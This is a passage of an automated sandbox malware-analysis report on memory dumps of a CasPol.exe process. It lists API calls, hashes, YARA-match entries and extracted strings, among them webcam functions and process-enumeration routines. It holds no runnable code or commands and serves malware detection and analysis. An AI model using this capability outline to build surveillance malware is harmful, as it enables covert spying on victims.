                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                                                                  • String ID: KeepAlive | Disabled
                                                                                                                                                                                                                                  • API String ID: 2993684571-305739064
                                                                                                                                                                                                                                  • Opcode ID: be5f9c6fe4c4c3ab2425d129c1f16fb8e343b85419f062c206cfa9b62e194523
                                                                                                                                                                                                                                  • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be5f9c6fe4c4c3ab2425d129c1f16fb8e343b85419f062c206cfa9b62e194523
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
• GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
• SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
• GetProcAddress.KERNEL32(00000000), ref: 00401441
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll$`Wu
• API String ID: 1646373207-4024354691
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• Sleep.KERNEL32(00000000), ref: 00403E8A
  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
• API String ID: 3469354165-3547787478
APIs
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
  • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
• Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
• CloseHandle.KERNEL32(00000000), ref: 0040E8AB
  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
  • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• String ID:
• API String ID: 2180151492-0
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                                                                  • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 7a457cb0477eb42b08a3a08fc8a8e94251b23341f2866997a7d328c6d90e6a15
                                                                                                                                                                                                                                  • Instruction ID: b33cccb8fbb3b2afb8450da89680e76c8306b4c6ac74daa2382c705215a82a31
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a457cb0477eb42b08a3a08fc8a8e94251b23341f2866997a7d328c6d90e6a15
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B41B236A00200DFDB14CF78C981A5EB3E5EF89754F6A4168E515EF291EB32ED41CB81
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0044FFC4
                                                                                                                                                                                                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B31
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 313313983-0
                                                                                                                                                                                                                                  • Opcode ID: 88201f02e49098e6f592975d0299b58774541eebf8c41212138823b53665fa5d
                                                                                                                                                                                                                                  • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88201f02e49098e6f592975d0299b58774541eebf8c41212138823b53665fa5d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0457715C
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0457717F
                                                                                                                                                                                                                                    • Part of subcall function 045756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04575702
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 045771A5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045771B8
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 045771C7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                                                  • Opcode ID: 10671b48b74f1d8ab0d47481eb5661d3d51ceebd3ff2b8c0c0948788ed6e2158
                                                                                                                                                                                                                                  • Instruction ID: ce4e64ce1ef848a14f3ce3a3562c39eb0b109ddd70e2d7f3cc335417a1604e1f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10671b48b74f1d8ab0d47481eb5661d3d51ceebd3ff2b8c0c0948788ed6e2158
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 070184726012157B27211AB67C88D7B6A6DFECAAE43140139BD04C7200FA64BC06A2B4
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                                                                                                                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B31
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044E1A0
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                                                  • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                                                                                                                                                  • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 1001962B
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001964E
                                                                                                                                                                                                                                    • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 10019674
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10019687
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10019696
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: cd0ed9cec5a439b2b5836332e9c626755adc875954e91f3a7efe53195477cde9
• Instruction ID: 6d2579429703740ef37404fee318dbdf00b11e5c7429adf95d1d5b6a0b07cec0
• Opcode Fuzzy Hash: cd0ed9cec5a439b2b5836332e9c626755adc875954e91f3a7efe53195477cde9
• Instruction Fuzzy Hash: B001A272601725BF671296B65CCCC7F7AADDFC6EA5326022DFE04CA245DA71CD4281B0
APIs
• GetLastError.KERNEL32(00000000,?,00000000,0457636D,04575713,00000000,?,04572249,?,?,04571D66,00000000,?,?,00000000), ref: 04575B7F
• _free.LIBCMT ref: 04575BB4
• _free.LIBCMT ref: 04575BDB
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04575BE8
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04575BF1
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: d3d0724cee8e8a2bec1a749d5214d72f7b71c9c0e9cd1d238f954bab67cec386
• Instruction ID: ad81f1f023bdc7a9648c75068fa866f7bd446e298e3a6f042c0993db6664215e
• Opcode Fuzzy Hash: d3d0724cee8e8a2bec1a749d5214d72f7b71c9c0e9cd1d238f954bab67cec386
• Instruction Fuzzy Hash: 4401A97624560AFBE71266347C88D3B2669FFC19787100138FD1FA6581FE65BC0A7164
APIs
• GetLastError.KERNEL32(00000000,?,?,00445359,00446B42,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578), ref: 00446F48
• _free.LIBCMT ref: 00446F7D
• _free.LIBCMT ref: 00446FA4
• SetLastError.KERNEL32(00000000), ref: 00446FB1
• SetLastError.KERNEL32(00000000), ref: 00446FBA
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
• Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
• Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
• Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
APIs
• GetLastError.KERNEL32(1000A5B7,1000A5B7,?,100160F1,10015AE2,?,?,1000C7AC,?,?,?,?,?,1000A4CA,1000A5B7,?), ref: 10016B05
• _free.LIBCMT ref: 10016B3A
• _free.LIBCMT ref: 10016B61
• SetLastError.KERNEL32(00000000,?,1000A5B7), ref: 10016B6E
• SetLastError.KERNEL32(00000000,?,1000A5B7), ref: 10016B77
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 5c84e16c2a66fa28b03aad63272ec2f76a486bc5c072b97fff44e3eae95c9b85
• Instruction ID: ac220c7f5632b09d9213959bcab330a47a9ba60472251cba742aca4957c4ce2f
• Opcode Fuzzy Hash: 5c84e16c2a66fa28b03aad63272ec2f76a486bc5c072b97fff44e3eae95c9b85
• Instruction Fuzzy Hash: 6701D13A648611A6D216D6744CC6E4B32A9EBC97A13794128FA19DE182FF31CCD25061
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
• GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Process$CloseHandleOpen$FileImageName
• String ID:
• API String ID: 2951400881-0
• Opcode ID: b8726634bc2d24e9c2e2bc3987753934be5434803c47aebb3633f4ceaff1eb89
• Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
• Opcode Fuzzy Hash: b8726634bc2d24e9c2e2bc3987753934be5434803c47aebb3633f4ceaff1eb89
• Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
APIs
• lstrlenW.KERNEL32(?,?,?,?,?,045710DF,?,?,?,00000000), ref: 04571E9A
• lstrcatW.KERNEL32(?,?,?,045710DF,?,?,?,00000000), ref: 04571EAC
• lstrlenW.KERNEL32(?,?,045710DF,?,?,?,00000000), ref: 04571EB3
• lstrlenW.KERNEL32(?,?,045710DF,?,?,?,00000000), ref: 04571EC8
• lstrcatW.KERNEL32(?,045710DF,?,045710DF,?,?,?,00000000), ref: 04571ED3
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
• Opcode ID: b2df0516d234471d4eba45c3135ee15dc28c3513cfb5f6dce3bf75d4f5658b82
• Instruction ID: 1a73c2ba86bef545ef1dbf3a2f49197680cfc85f68ddf59b6a560181e767a0f7
• Opcode Fuzzy Hash: b2df0516d234471d4eba45c3135ee15dc28c3513cfb5f6dce3bf75d4f5658b82
• Instruction Fuzzy Hash: 42F089261001107AE6213729BC85E7F7B7CFFC5B60F040029F90893290BB546C46A2B5
APIs
• _free.LIBCMT ref: 045791D0
  • Part of subcall function 0457571E: HeapFree.KERNEL32(00000000,00000000,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?), ref: 04575734
  • Part of subcall function 0457571E: GetLastError.KERNEL32(?,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?,?), ref: 04575746
• _free.LIBCMT ref: 045791E2
• _free.LIBCMT ref: 045791F4
• _free.LIBCMT ref: 04579206
• _free.LIBCMT ref: 04579218
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 2c06a57f7d7b212f45a7f5959a1baab9acc1651a3e4217990bc16abf97e81185
                                                                                                                                                                                                                                  • Instruction ID: e9d75e962b5e9aab3e80bfdd616339536a51f954efac6dd057bc748c616411da
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c06a57f7d7b212f45a7f5959a1baab9acc1651a3e4217990bc16abf97e81185
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FF062B2524644B7A620EB58F5C4C0E7BD9FA80794354182DF90AE7900DB35FC80AA64
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044F7B5
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044F7C7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044F7D9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044F7EB
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044F7FD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                                                                  • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CCAD
                                                                                                                                                                                                                                    • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
